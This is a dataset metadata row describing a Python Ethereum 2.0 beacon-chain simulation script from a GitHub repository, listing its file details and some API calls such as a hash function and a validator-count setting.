| hwwhww/trinity | eth2_sim/simulation/run.py | run.py | py | 4,210 | python | en | code | null | github-code | 1 | [
{
"api_name": "eth2.beacon._utils.hash.hash_eth2",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sim_config.Config.NUM_VALIDATORS",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sim_config.Config",
"line_number": 31,
"usage_type": "name"
},
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.